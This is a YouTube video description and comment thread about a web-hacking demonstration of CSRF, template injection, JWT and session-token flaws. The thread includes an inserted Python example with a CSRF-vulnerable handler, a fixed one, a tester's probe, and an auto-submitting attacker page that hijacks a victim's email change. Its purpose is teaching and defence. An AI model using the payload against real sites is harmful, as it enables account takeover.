XSS Rat shows us how he hacks websites in 5 minutes and gets customers. He approaches companies and gives them 1 hour of free consultancy. But he is often able to hack their website in 5 minutes - and gain a new client :) He then shows them how they can better secure their websites against actual attacks.
XSS Rat's new course: davidbombal.wiki/xssratpentest
// MENU //
00:00 - Coming up // Hacking websites in 5 minutes!
00:48 - Intro & Disclaimer
00:59 - How to hack websites with XSS
02:17 - Hacking websites demo
03:10 - CAPTCHA vulnerability
04:49 - CSRF token vulnerability
17:19 - Changing emails
20:36 - Client Side Template Injection
24:30 - Mass Assignment vulnerability
28:23 - Open Redirect vulnerability
31:54 - Stealing session tokens
34:44 - JWT vulnerability
38:37 - WordPress // Don't use plugins!
39:10 - Even experts can make mistakes
40:38 - Recommended security scanners
41:05 - Account takeover vulnerabilities
45:37 - Fight the cheese monster! // hackerats.com
52:00 - Thanks XSS Rat! // Free labs on hackxpert.com
52:52 - What to expect in the next video
53:26 - Conclusion
// Previous video //
XSS hacking: ua-cam.com/video/PzRQhpbYbeg/v-deo.html
// NEW COURSE //
Get XSS Rat's New Pentest course: davidbombal.wiki/xssratpentest
// Demo Sites //
This video: hackxpert.com/00032422342/ratsite/
Others mentioned:
- hackxpert.com/labs
- hackxpert.com/ratsite
// David's SOCIAL //
Discord: discord.com/invite/usKSyzb
Twitter: twitter.com/davidbombal
Instagram: instagram.com/davidbombal
LinkedIn: www.linkedin.com/in/davidbombal
Facebook: facebook.com/davidbombal.co
TikTok: tiktok.com/@davidbombal
UA-cam: ua-cam.com/users/davidbombal
// XSS Rat SOCIAL //
Twitter: twitter.com/theXSSrat
UA-cam: ua-cam.com/users/TheXSSrat
Website: thexssrat.podia.com/
// XSS Rat's Udemy course //
New Pentest course: davidbombal.wiki/xssratpentest
XSS Survival Guide: www.udemy.com/course/xss-survival-guide/
// XSS Rat's courses and bootcamps //
thexssrat.podia.com/
// MY STUFF //
www.amazon.com/shop/davidbombal
// SPONSORS //
Interested in sponsoring my videos? Reach out to my team here: sponsors@davidbombal.com
Disclaimer: This video is for educational purposes only.
Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended.
Thank you for supporting me and this channel!
Thx for the video! 👌
Nice video
Hey! ... Lol!
Hey David, please invite Farah Hawa, Vickie Li, & Georgia Weidman
Hey man.. I have lost one account. When I reset the password, the homepage says the email is not registered.. support can't help without the right email..
The same method to get my account doesn't work without the current password...
Have you an idea to get it back?
All my life was saved in this account...
Been following him for ages on twitter. Incredibly talented guy 👏🏻
Agreed. Wesley is great!
One of the best hackers I know, he's a genius
@davidbombal well you too
DB is the most simplistic and most informative person
Thank you! I try to keep things simple :)
As a developer I know a thing or two about preventing the basic and most common vulnerabilities/attacks. It's always good to have tools to learn how these types of "hacks" work. It's nasty how a small line of code (or lack thereof) can cause so much damage. PS: don't forget to update (patch) OpenSSL v3 folks 😛👍
These videos are really good David. I think what is key in what XSS Rat was doing, if you take for instance the CSRF example, is that he knows how CSRF is implemented as a best practice. Then when he encounters an implementation that acts differently, he knows that he is onto a vulnerability. I encourage junior programmers to take a look at this, because it's good to see the way a hacker approaches your app and the different ways of thinking. Your channel is slowly dragging me into the hacking scene... thanks
Ah, uncle rat! Thanks for bringing him to your channel. Dude's awesome!
Legend. Simply the most logical, interesting, topical, informative and highly engaging teacher bar none. Thanks David.
Help me please
Thanks David , for providing quality things to the viewers
David sir, as always 🔥 putting out great content 💗🙏
Thank you! I appreciate it :)
We love these long technical videos David! Keep them coming
David, Wesley was awesome! The tutorial was very informative too! Thanks for sharing!
Thank you David and XSS Rat for the great information, an hour went by and I didn't even notice.
Great video David on cross eye scripting thanks David 👏🏾
You're welcome! Cross Site Scripting is a nightmare :(
David, thank you for bringing this delicious content to all of us who are learning in the cybersecurity sector.
You're welcome!
I love this and I'm trying to learn how to code. I am always getting hacked it's like I'm the person that hackers practice on. So from your page I'm learning how to protect myself. Love this page and keep it going.
DB absolutely incredible and down to earth person as always, thanks David for enhancing our skills and I hope you're having a good day
Thank you! If I'm doing my job right, you are learning something new in every video :)
David is such a great guy and has one of the best UA-cam channels in cyber security stuff, and this was a big advertisement for the rat guy...
Quality informative video!! Thank you so much for this great explanation. I'll surely implement these procedures against the vulnerabilities, and cheer the religion of cybersecurity 🥳
Squirrely bracket, squirrely bracket. Squirrel power! You go, squirrel!
Awesome showcasing here! For folks out there.. just to share, I came across a couple of these concepts in the hack the box labs in the past. If you are keen to practice, For the jwt vulnerability, you can try it in the box called "secret", for client side template injection, its "postman".
You need to be on Rumble. Drop the mic! Be the resistance David!
Thank You Both 💖
You're welcome!
All his points are valid. Agile coupled with younger single-target-focused programmers who know very little of the backend systems and only focus on meeting tight deadlines.. is only going to exacerbate issues further. Many of them don't even understand how to fully implement these types of controls, as he points out.
And also thank you Mr David, you might not remember but you assisted with one of my projects. Still appreciate it.
Been waiting for this to happen!! Knew it would..
Congrats Uncle Rat, only the beginning
Hi David,
If you are afraid of getting some videos banned by UA-cam, then create a rumble account and upload those videos there. I am currently learning cybersecurity because of you.
Thanks David for a fantastic video! Thanks XSS Rat!
If most people knew these things they'd pull a Ron Swanson and throw out their computers or phones. 😂
lol... I think a lot of people would agree with you.... better to live offline :)
@davidbombal hard to do these days especially if we work in IT. 😂
I aspire to be as knowledgeable as dudes like this
Yooooo, you got Uncle Rat on the channel!
He is super awesome!!
Always great content and new things to learn love your videos David♥️ helped me in learning more ethical hacking
Thank you! I'm very happy to hear that :)
That brain must fill the whole head :D
I love when guys who don't look special show just how genius they can be.
Serious respect for XSS Rat.
His kungfu is strong :)
Hello
"Rat hack website in 5 minutes" the video : 5 3 m i n u t e s
Amazing. This is like the part 2 ;)
Thank you! Yes - based on the feedback on the previous video, I asked Wesley to cover more stuff - especially showing us demos of what is possible.
man i wish David had his own tv show
Nice way to show the use of “lay of the land” tools to use to pentest.
David An Amazing Teacher !
Please make a video on how to find mobile by IMEI number.
As I was clicking the video I was getting ready to grab my airgun to get the damn critter...
🤣
You know a REAL SMART GEEK when you see one...
They are so perfect that when they make a simple mistake- they become flustered.
This guy is an amazing shell popper 🍾 🥂
Been following rat guy for a while now. He is smart
Never gonna give you up.... lol. Sorry couldn't resist. Not sure how wise it is to persist 'hacks' between logins on a practice site; could potentially expose a learner to something harmful.
Amazing video. Thank you very much!
You're welcome! Glad you liked it!
Hello David, I hope you will answer my question yes. My question is, do you also have classes on web security?
Well done Lesley and David xxx
At 11:00 you can just click on "view source" in your payload and you'll get all your parameters in the format you like
What about the new Tesla model pie phone and it being able to interact with neuralink
Hi, XSS Rat I am planning to become an Ethical Hacker. Where do you think that I should start from?
Hello David, your videos are so informative and interesting. Thank You so much for creating such a content.
Can you please make some videos on how to test online /multiplayer game hacking/pentesting ?
Thank you
CSRF can be exploited by merely VIEWING your code, not just clicking. Love the trick
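The CSRF points raised in the two comments above (knowing the best-practice implementation so that a deviating one stands out, and a CSRF needing only a page view rather than a click) in working code. This is an added example, not code from the video, from XSS Rat, or from the hackxpert labs: a change-email handler with a broken token check beside the correct one, the auto-submitting attacker page, and the probe a tester would run against both. The session layout, the target URL, the host and the email addresses are assumptions made up for the example.

```python
import hmac
import html
import secrets


def new_session(user):
    """Constructed server-side session (assumption): in a real app this lives
    in the session store keyed by the session cookie."""
    return {"user": user, "csrf_token": secrets.token_hex(16)}


def render_change_email_form(session):
    """The legitimate form: the server embeds the per-session token."""
    return (
        '<form method="POST" action="/change-email">'
        f'<input type="hidden" name="csrf_token" value="{html.escape(session["csrf_token"])}">'
        '<input name="email"><button>Save</button></form>'
    )


def change_email_weak(session, form):
    """Deviant implementation: a csrf_token field merely has to be present.
    It is never compared with the session's token, so any value passes."""
    if not form.get("csrf_token"):
        return False
    session["user"] = form["email"]
    return True


def change_email_strong(session, form):
    """Best-practice implementation: the submitted token must equal the one
    bound to this session; compare_digest avoids a timing side channel."""
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(session["csrf_token"], supplied):
        return False
    session["user"] = form["email"]
    return True


def csrf_poc_page(attacker_email, target="https://target.example/change-email"):
    """Attacker-hosted page (hypothetical host): the form submits itself on
    load, so the victim only has to view the page, not click anything. The
    browser attaches the victim's session cookie to the cross-site POST."""
    return (
        f'<form id="f" method="POST" action="{html.escape(target)}">'
        '<input type="hidden" name="csrf_token" value="x">'
        f'<input type="hidden" name="email" value="{html.escape(attacker_email)}">'
        '</form><script>document.getElementById("f").submit()</script>'
    )


def probe_csrf(handler):
    """Tester's check: replay the email change with no token, a bogus token
    and the real token against a fresh victim session each time. Returns the
    labels of the cases that changed the email; anything other than
    ['valid'] means the protection is broken."""
    succeeded = []
    for label in ("missing", "bogus", "valid"):
        session = new_session("victim@example.com")
        form = {"email": "attacker@example.com"}
        if label == "bogus":
            form["csrf_token"] = "x"
        elif label == "valid":
            form["csrf_token"] = session["csrf_token"]
        if handler(session, form) and session["user"] == "attacker@example.com":
            succeeded.append(label)
    return succeeded


if __name__ == "__main__":
    print("weak handler accepted:", probe_csrf(change_email_weak))
    print("strong handler accepted:", probe_csrf(change_email_strong))
    print(csrf_poc_page("attacker@example.com"))
```

The probe is the same move the video describes: once you know the token should be bound to the session, you resubmit the request with the token removed or replaced and watch whether the state change still happens. Note that the token check only protects a browser that also sends the session cookie cross-site; a `SameSite` cookie attribute is a second, independent layer, not a replacement for the comparison in `change_email_strong`.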
This is the first video that seems a bit weird. Like, I never knew these exploits were still relevant enough to mention? It's like hearing people say: "Don't use 0000 or 1234 as a phone lock". It doesn't hurt to mention it again of course, I'm just surprised.
Yes wesleyyy my bro, been watching your channel a lot recently
Is it possible to change a website content permanently? If yes then can you please give me Guess? It's my humble Request🥺. (Just for Educational purpose)
Please more SDR videos, like SS7 attacks and SMS decryption
David,
please, I have seen the courses he offers on Udemy.
But I didn't know which course would teach me what this video on UA-cam does. Can you tell me!
You know, I'm an ethical hacker and I send a lot of advice to many companies, sometimes wanting to help for free, and sometimes they don't reply to my messages or emails.
Hello Mr David can we hack Nuclear missiles ? Reply
Hi sir, what is the cost for joining this channel? I know the cost is already given; what I'm seeing is ₹59, which is less than 💲1. I'm assuming that you had asked 59 dollars for joining, am I right?
we are new at computers, I am 6 and a half months old, and on my fathers lap. This is satisfying when he types my questions, so I am wondering, if you like milk?
I wouldn't call myself a rat, that's just not the animal I'd choose lol. XSS lion maybe, but rat lol
That's all good and fine, the thing is most valuable websites nowadays are not vulnerable anymore, and all these demos are executed on vulnerable platforms. Challenging is hacking a non-vulnerable website.
He mentions dropbox a lot. Is dropbox a client and vulnerable to these exploits or he's implying a company like dropbox is victim to these attacks? (Box)
I am almost 50 years old but I want to learn hacking, please tell me what to learn first... Thank you
I love watching you guys videos they always make me go to sleep.
I have a question.
Can we exploit SQLi through XSS. I mean post exploitation fr XSS to SQLi.
In simple words, gaining access to the website's database using XSS vulnerability
best ever❤️❤️
Thank you!
Apart from CAPTCHA, what if the CAPTCHA is invisible? Is that also a problem?
There is!!! Uncle Rat!!!
That's why levels of access are so important
These are very trivial examples today.
Not all that long ago (5/6 years) there was a quite well known site (coveritlive) that had a stupid vulnerability - moderation bypass, quite embarrassing for sites that hosted chat or scores from them. At the time, I demo'd it for them on their own demo page.
David u keep giving us clues 😂
Around 11:00 he could have just clicked view raw source and not had to add the & manually later.
Another Great content. Thanks, would love to watch iOS or Android hacking.
Thank you, XSS-Rat, amazing performance like always.
Nice video, also Do about api hacking
Can we get a online payment systems demo? Like stripe or square
My wife is getting really tired of these videos being my date night suggestions.
Bro, do you know the Bjorka hacker?
Please
You can absolutely use API to solve captcha in a bot...
Amazing explanation 👏👏🙌🙌
That's why I never, ever use cookies.
Now that I understand you just close the tag and inject your code behind it I’m going on a bug hunt wish me luck😎
Thanks guys!!
He needs another user (person) to direct. May I suggest?
My PC was hacked and all my email accounts were scammed
What web browser is he using?
Alone we survive, together we prosper 🐀
good stuff. Thanks both of you.
Can you make a video on how to pull a Wi-Fi password using the address of Wi-Fi
Can you do something with a flipper zero
How do I hire Wesley?
Interesting, pls I need to learn ethical hacking to protect my family.
Hello, don't be tired. How to extract emails from a website?
Android hacking to get cookies, cache memory, tokens, to be able to log in on Windows from Android application cookies or cache memory...? Thanks
Please make a video on how to trace android with IMEI number. Please
Is it possible to clone an FB target ID?
Please make a video on it 🥺🥺
Great video. More please.
Can anyone put me through on how I can locate a hidden item on a shopping site? Would love to get assistance from pros in the computer world.
Hi, I am from Pakistan. Please guide me or tell me the complete path to hacking, as here a full guide or path is not available. I want to become a hacker; I am good at C, C++, C#, Python, but want to become a hacker.